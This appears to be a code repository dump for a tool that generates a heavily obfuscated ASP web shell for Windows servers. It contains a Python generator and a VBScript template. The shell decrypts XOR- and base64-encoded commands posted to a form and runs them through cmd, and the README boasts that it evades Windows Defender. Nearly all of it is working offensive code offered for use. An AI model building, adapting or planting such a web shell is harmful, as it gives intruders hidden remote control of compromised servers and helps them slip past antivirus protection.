[ { "path": "LICENSE.md", "content": "MIT License\n\nCopyright (c) 2024 Dylan Evans\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE." }, { "path": "README.md", "content": "# ASPJinjaObfuscator\n\n![ninja](img/ninja.webp)\n\nA heavily obfuscated `Windows` based `ASP` web shell generation tool utilizing the power of Python's `Jinja2` templating engine. Generates a web shell with randomized variable/function names and HTML strings of random lengths, XOR encrypted strings with base64 encoding, a random amount of newlines, a random amount of `VBScript/HTML` comments with a random amount of random strings, and a random encryption key per generation. Tested as bypassing the latest version of `Windows Defender` as of `04/22/2024` with `Cloud-delivered protection` enabled.\n\n## Installation\n\nMake sure that you have `Python3` with the `Jinja2` & `pyperclip` `pip` packages installed. Install the `pip` requirements with the following command:\n\n```bash\npip3 install -r requirements.txt\n```\n\n## Usage\n\nRun the program with no commandline arguments from the directory where the script and the `Jinja2` template is installed, it will then generate a randomized web shell named `output.asp`. The program will ask you what commands you would like to run, type them into the program in plaintext and it will give you the encrypted versions. It will automatically copy them to the clipboard, paste these encrypted commands into the web shell, it will decrypt and then run them. That's it, time to **PROFIT**!" }, { "path": "asp-jinja-obfuscator.py", "content": "import random\nimport string\nimport base64\nimport pyperclip\nfrom jinja2 import Environment, FileSystemLoader\n\ndef random_string():\n length = random.randint(5, 100) # Generate a random length between 5 and 100\n return ''.join(random.choice(string.ascii_letters) for _ in range(length))\n\ndef xor_encrypt(data, key):\n return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))\n\ndef encode_base64(data):\n return base64.b64encode(data.encode()).decode()\n\ndef render_template(template_name, **kwargs):\n env = Environment(loader=FileSystemLoader('./'))\n template = env.get_template(template_name)\n return template.render(**kwargs)\n\ndef add_random_newlines(template, max_newlines=5):\n \"\"\"\n Adds random newlines to a given template string at the end of lines to avoid breaking the code.\n \n :param template: str - The original multiline template string.\n :param max_newlines: int - The maximum number of newlines to add.\n :return: str - The mutated template string with newlines added.\n \"\"\"\n # Split the template into lines\n lines = template.splitlines()\n \n # Select random line indices to add newlines after them\n newline_positions = sorted(random.sample(range(len(lines)), min(max_newlines, len(lines))))\n\n # Add extra newlines to the selected lines\n for index in newline_positions:\n lines[index] += '\\n' * random.randint(1, 50) # Add between 1 and 50 newlines\n \n # Reassemble the template with the added newlines\n return '\\n'.join(lines)\n\ndef generate_comments(spaces_count, html_format=False):\n \"\"\"\n Generates random comment lines with a specified number of spaces prefixed,\n each containing a random number of random strings. The format of the comments\n can be either HTML or VBScript based on the html_format flag.\n \n :param spaces_count: int - Number of spaces to prepend to each comment line.\n :param html_format: bool - If True, returns HTML formatted comments, else VBScript comments.\n :return: str - A string of one or more randomly generated comment lines.\n \"\"\"\n # Random number of comment lines to generate\n number_of_comments = random.randint(1, 50)\n \n # Generate the comment block\n comment_block = \"\"\n space_prefix = ' ' * spaces_count\n \n for _ in range(number_of_comments):\n # Random number of strings to generate per comment line\n number_of_strings = random.randint(1, 20) \n \n # Collect multiple random strings\n comment_strings = ' '.join(random_string() for _ in range(number_of_strings))\n \n if html_format:\n comment_block += f\"{space_prefix}\\n\"\n else:\n comment_block += f\"{space_prefix}' {comment_strings}\\n\"\n \n return comment_block.strip()\n\ndef obfuscate_code(key):\n # Find and replace all template variables\n to_replace = {\n 'encryptedInput': random_string(),\n 'encryptedCommand': random_string(),\n 'decryptedCommand': random_string(),\n 'objShell': random_string(),\n 'objExecObject': random_string(),\n 'strOutput': random_string(),\n 'keyString': random_string(),\n 'tempDecodedString': random_string(),\n 'encryption_key': key,\n 'cmd_Decrypted': random_string(),\n 'WScript_Shell_Decrypted': random_string(),\n 'Base64Encode': random_string(),\n 'strText': random_string(),\n 'objXML': random_string(),\n 'objNode': random_string(),\n 'StringToBinary': random_string(),\n 'MultiByteToBinary': random_string(),\n 'arrData': random_string(),\n 'stream': random_string(),\n 'Base64Decode': random_string(),\n 'BinaryToString': random_string(),\n 'binaryVal': random_string(),\n 'objStream': random_string(),\n 'XORStrings': random_string(),\n 'input1': random_string(),\n 'input2': random_string(),\n 'char1': random_string(),\n 'char2': random_string(),\n 'xorValue': random_string(),\n 'result': random_string(),\n 'iterator': random_string(),\n 'base64DecodedCommand': random_string(),\n 'cmd': encode_base64(xor_encrypt(\"cmd /c \", key)),\n 'WScript_Shell': encode_base64(xor_encrypt(\"WScript.Shell\", key)),\n 'Execute_Command': random_string(),\n 'Execute_Encrypted_Command': random_string(),\n 'Enter_Encrypted_Command': random_string(),\n 'inputSize': random.randint(5, 250),\n 'SubmitValue': random_string(),\n 'vbComment': generate_comments(0),\n 'vbComment4': generate_comments(4),\n 'vbComment8': generate_comments(8),\n 'vbComment12': generate_comments(12),\n 'htmlComment': generate_comments(0, html_format=True),\n 'htmlComment4': generate_comments(4, html_format=True),\n 'htmlComment8': generate_comments(8, html_format=True),\n }\n\n # Load the template and render it with the variables\n obfuscated_code = render_template('shell.py.j2', **to_replace)\n\n # Add random newlines to the obfuscated code\n return add_random_newlines(obfuscated_code, 100)\n\ndef main():\n key = random_string() \n obfuscated_code = obfuscate_code(key)\n \n with open(\"output.asp\", \"w\") as output_file:\n output_file.write(obfuscated_code)\n\n while True:\n command = input(\"Enter command to encrypt: \")\n encrypted_command = encode_base64(xor_encrypt(command, key))\n print(f\"Encrypted: {encrypted_command}\")\n pyperclip.copy(encrypted_command)\n print(\"Encrypted command copied to clipboard.\")\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "requirements.txt", "content": "Jinja2>=3.0\npyperclip>=1.8.2" }, { "path": "shell.py.j2", "content": "<%\n{{ vbComment }}\nIf Request.Form(\"{{ encryptedInput }}\") <> \"\" Then\n {{ vbComment4 }}\n Dim {{ encryptedCommand }}, {{ decryptedCommand }}\n {{ vbComment4 }}\n Dim {{ objShell }}, {{ objExecObject }}, {{ strOutput }}\n {{ vbComment4 }}\n Dim {{ keyString }}, {{ tempDecodedString }} \n {{ vbComment4 }}\n Dim {{ cmd_Decrypted }}, {{ WScript_Shell_Decrypted }}\n {{ vbComment4 }}\n {{ keyString }} = \"{{ encryption_key }}\"\n {{ vbComment4 }}\n {{ tempDecodedString }} = {{ Base64Decode }}(\"{{ cmd }}\")\n {{ vbComment4 }}\n {{ cmd_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})\n {{ vbComment4 }}\n {{ tempDecodedString }} = {{ Base64Decode }}(\"{{ WScript_Shell }}\")\n {{ vbComment4 }}\n {{ WScript_Shell_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }})\n {{ vbComment4 }}\n Function {{ Base64Encode }}({{ strText }})\n {{ vbComment8 }}\n Dim {{ objXML }}, {{ objNode }}\n {{ vbComment8 }}\n Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))\n {{ vbComment8 }}\n Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))\n {{ vbComment8 }}\n {{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)\n {{ vbComment8 }}\n {{ objNode }}.nodeTypedValue = {{ StringToBinary }}({{ strText }})\n {{ vbComment8 }}\n {{ Base64Encode }} = {{ objNode }}.text\n {{ vbComment8 }}\n Set {{ objNode }} = Nothing\n {{ vbComment8 }}\n Set {{ objXML }} = Nothing\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n Function {{ StringToBinary }}({{ strText }})\n {{ vbComment8 }}\n Dim {{ arrData }}\n {{ vbComment8 }}\n {{ arrData }} = {{ MultiByteToBinary }}({{ strText }})\n {{ vbComment8 }}\n {{ StringToBinary }} = {{ arrData }}\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n Function {{ MultiByteToBinary }}({{ strText }})\n {{ vbComment8 }}\n Dim {{ stream }}\n {{ vbComment8 }}\n Set {{ stream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))\n {{ vbComment8 }}\n {{ stream }}.Type = 2\n {{ vbComment8 }}\n {{ stream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)\n {{ vbComment8 }}\n {{ stream }}.Open\n {{ vbComment8 }}\n {{ stream }}.WriteText {{ strText }}\n {{ vbComment8 }}\n {{ stream }}.Position = 0\n {{ vbComment8 }}\n {{ stream }}.Type = 1\n {{ vbComment8 }}\n {{ MultiByteToBinary }} = {{ stream }}.Read\n {{ vbComment8 }}\n {{ stream }}.Close\n {{ vbComment8 }}\n Set {{ stream }} = Nothing\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n Function {{ Base64Decode }}({{ strText }})\n {{ vbComment8 }}\n Dim {{ objXML }}, {{ objNode }}\n {{ vbComment8 }}\n Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116))\n {{ vbComment8 }}\n Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52))\n {{ vbComment8 }}\n {{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)\n {{ vbComment8 }}\n {{ objNode }}.text = {{ strText }}\n {{ vbComment8 }}\n {{ Base64Decode }} = {{ BinaryToString }}({{ objNode }}.nodeTypedValue)\n {{ vbComment8 }}\n Set {{ objNode }} = Nothing\n {{ vbComment8 }}\n Set {{ objXML }} = Nothing\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n Function {{ BinaryToString }}({{ binaryVal }})\n {{ vbComment8 }}\n Dim {{ objStream }}\n {{ vbComment8 }}\n Set {{ objStream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))\n {{ vbComment8 }}\n {{ objStream }}.Type = 1\n {{ vbComment8 }}\n {{ objStream }}.Open\n {{ vbComment8 }}\n {{ objStream }}.Write {{ binaryVal }}\n {{ vbComment8 }}\n {{ objStream }}.Position = 0\n {{ vbComment8 }}\n {{ objStream }}.Type = 2\n {{ vbComment8 }}\n {{ objStream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49)\n {{ vbComment8 }}\n {{ BinaryToString }} = {{ objStream }}.ReadText\n {{ vbComment8 }}\n {{ objStream }}.Close\n {{ vbComment8 }}\n Set {{ objStream }} = Nothing\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n Function {{ XORStrings }}({{ input1 }}, {{ input2 }})\n {{ vbComment8 }}\n Dim {{ result }}\n {{ vbComment8 }}\n Dim {{ iterator }}\n {{ vbComment8 }}\n Dim {{ char1 }}, {{ char2 }}, {{ xorValue }}\n {{ vbComment8 }}\n {{ result }} = \"\"\n {{ vbComment8 }}\n For {{ iterator }} = 1 To Len({{ input1 }})\n {{ vbComment12 }}\n {{ char1 }} = Asc(Mid({{ input1 }}, {{ iterator }}, 1))\n {{ vbComment12 }}\n {{ char2 }} = Asc(Mid({{ input2 }}, ({{ iterator }} - 1) Mod Len({{ input2 }}) + 1, 1))\n {{ vbComment12 }}\n {{ xorValue }} = {{ char1 }} Xor {{ char2 }}\n {{ vbComment12 }}\n {{ result }} = {{ result }} & Chr({{ xorValue }})\n {{ vbComment12 }}\n Next\n {{ vbComment8 }}\n {{ XORStrings }} = {{ result }}\n {{ vbComment8 }}\n End Function\n {{ vbComment4 }}\n {{ encryptedCommand }} = Request.Form(\"{{ encryptedInput }}\")\n {{ vbComment4 }}\n {{ base64DecodedCommand }} = {{ Base64Decode }}({{ encryptedCommand }})\n {{ vbComment4 }}\n {{ decryptedCommand }} = {{ XORStrings }}({{ base64DecodedCommand }}, {{ keyString }})\n {{ vbComment4 }}\n Set {{ objShell }} = CreateObject({{ WScript_Shell_Decrypted }})\n {{ vbComment4 }}\n Set {{ objExecObject }} = {{ objShell }}.Exec({{ cmd_Decrypted }} & {{ decryptedCommand }})\n {{ vbComment4 }}\n {{ strOutput }} = {{ objExecObject }}.StdOut.ReadAll()\n {{ vbComment4 }}\n Set {{ objExecObject }} = Nothing\n {{ vbComment4 }}\n Set {{ objShell }} = Nothing\n {{ vbComment4 }}\nEnd If\n{{ vbComment }}\n%>\n\n{{ htmlComment }}\n\n{{ htmlComment }}\n {{ Execute_Command }}\n {{ htmlComment4 }}\n\n{{ htmlComment }}\n\n{{ htmlComment }}\n

{{ Execute_Encrypted_Command }}

\n {{ htmlComment4 }}\n
\n {{ htmlComment8 }}\n
\n {{ htmlComment8 }}\n

\n {{ htmlComment8 }}\n \n {{ htmlComment8 }}\n
\n {{ htmlComment4 }}\n <% If Request.Form(\"{{ encryptedInput }}\") <> \"\" Then %>\n {{ htmlComment8 }}\n 
<%={{ strOutput }}%>
\n {{ htmlComment8 }}\n <% End If %>\n {{ htmlComment4 }}\n\n{{ htmlComment }}\n" } ]